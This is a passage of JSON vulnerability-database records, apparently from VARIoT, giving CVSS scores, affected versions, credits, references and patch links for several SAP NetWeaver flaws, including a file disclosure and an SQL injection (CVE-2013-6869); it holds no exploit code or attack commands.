"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1516"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1517"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2513"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/corelabs-advisories"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2514"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1687910."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2512"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46."
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"date": "2012-05-08T00:00:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"date": "2012-05-09T07:38:14",
"db": "PACKETSTORM",
"id": "112569"
},
{
"date": "2012-05-08T15:15:15",
"db": "PACKETSTORM",
"id": "112538"
},
{
"date": "2012-05-15T04:21:43.407000",
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"date": "2012-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2512"
},
{
"date": "2012-09-04T05:50:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002402"
},
{
"date": "2017-08-29T01:31:37.383000",
"db": "NVD",
"id": "CVE-2012-2512"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of DiagTraceStreamI Denial of service in function ( Daemon crash ) Vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002402"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-160"
}
],
"trust": 0.6
}
}
var-201304-0470
Vulnerability from variot
Some RFC functions in SAP NetWeaver have errors when processing SPFC messages, allowing remote attackers to exploit the vulnerability to obtain arbitrary file content. SAP NetWeaver is a set of service-oriented integrated application platform of German SAP company. The platform provides a development and runtime environment for SAP applications. An arbitrary file leak vulnerability exists in SAP NetWeaver, which originates from a program that incorrectly validates user-supplied input. A remote attacker could use this vulnerability to leak arbitrary files in the context of a program and help launch further attacks. There are vulnerabilities in SAP NetWeaver 7.30, other versions may also be affected. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201304-0470",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"db": "BID",
"id": "59501"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin (ERPScan)",
"sources": [
{
"db": "BID",
"id": "59501"
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-04554",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-04554",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-04554"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Some RFC functions in SAP NetWeaver have errors when processing SPFC messages, allowing remote attackers to exploit the vulnerability to obtain arbitrary file content. SAP NetWeaver is a set of service-oriented integrated application platform of German SAP company. The platform provides a development and runtime environment for SAP applications. \nAn arbitrary file leak vulnerability exists in SAP NetWeaver, which originates from a program that incorrectly validates user-supplied input. A remote attacker could use this vulnerability to leak arbitrary files in the context of a program and help launch further attacks. There are vulnerabilities in SAP NetWeaver 7.30, other versions may also be affected. This may aid in further attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
},
{
"db": "BID",
"id": "59501"
},
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
}
],
"trust": 1.53
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "59501",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-04554",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "53198",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586",
"trust": 0.6
},
{
"db": "IVD",
"id": "73D46A74-1F27-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"db": "BID",
"id": "59501"
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
]
},
"id": "VAR-201304-0470",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-04554"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-04554"
}
]
},
"last_update_date": "2022-05-17T02:02:32.400000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver RFC Function Arbitrary File Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/33706"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04554"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.9,
"url": "http://erpscan.com/advisories/dsecrg-13-011-sap-netweaver-pfl-smb-relay/"
},
{
"trust": 0.6,
"url": "http://www.secunia.com/advisories/53198/"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/59501"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"db": "BID",
"id": "59501"
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"db": "BID",
"id": "59501"
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-02T00:00:00",
"db": "IVD",
"id": "73d46a74-1f27-11e6-abef-000c29c66e3d"
},
{
"date": "2013-04-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"date": "2013-04-25T00:00:00",
"db": "BID",
"id": "59501"
},
{
"date": "2013-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-04554"
},
{
"date": "2013-04-25T00:00:00",
"db": "BID",
"id": "59501"
},
{
"date": "2013-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver RFC Function Arbitrary File Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "59501"
},
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201304-586"
}
],
"trust": 0.6
}
}
var-201311-0394
Vulnerability from variot
SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is a set of service-oriented integrated application platform of German SAP company. The platform provides a development and runtime environment for SAP applications. The vulnerability stems from insufficient filtering of user-submitted input before the program constructs SQL query statements. Attackers can use this vulnerability to steal cookie-based authentication, control applications, access or modify data, or exploit potential vulnerabilities in the underlying database. SAP NetWeaver 7.30 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0394",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.30"
}
],
"sources": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "BID",
"id": "63748"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6869"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin of ERPScan",
"sources": [
{
"db": "BID",
"id": "63748"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
}
],
"trust": 0.9
},
"cve": "CVE-2013-6869",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-6869",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14529",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "b008589a-1efd-11e6-abef-000c29c66e3d",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6869",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-14529",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-354",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is a set of service-oriented integrated application platform of German SAP company. The platform provides a development and runtime environment for SAP applications. The vulnerability stems from insufficient filtering of user-submitted input before the program constructs SQL query statements. Attackers can use this vulnerability to steal cookie-based authentication, control applications, access or modify data, or exploit potential vulnerabilities in the underlying database. \nSAP NetWeaver 7.30 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"db": "BID",
"id": "63748"
},
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6869",
"trust": 3.5
},
{
"db": "SECUNIA",
"id": "55736",
"trust": 2.2
},
{
"db": "BID",
"id": "63748",
"trust": 1.5
},
{
"db": "SECTRACK",
"id": "1029352",
"trust": 1.0
},
{
"db": "CNVD",
"id": "CNVD-2013-14529",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257",
"trust": 0.6
},
{
"db": "IVD",
"id": "B008589A-1EFD-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "BID",
"id": "63748"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"id": "VAR-201311-0394",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
}
]
},
"last_update_date": "2023-12-18T13:20:04.398000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver \u0027SRTT_GET_COUNT_BEFORE_KEY_RFC\u0027 patch for SQL injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/41156"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"db": "NVD",
"id": "CVE-2013-6869"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/55736"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1783795"
},
{
"trust": 1.0,
"url": "http://www.securitytracker.com/id/1029352"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6869"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6869"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/55736/"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/63748"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "BID",
"id": "63748"
},
{
"db": "JVNDB",
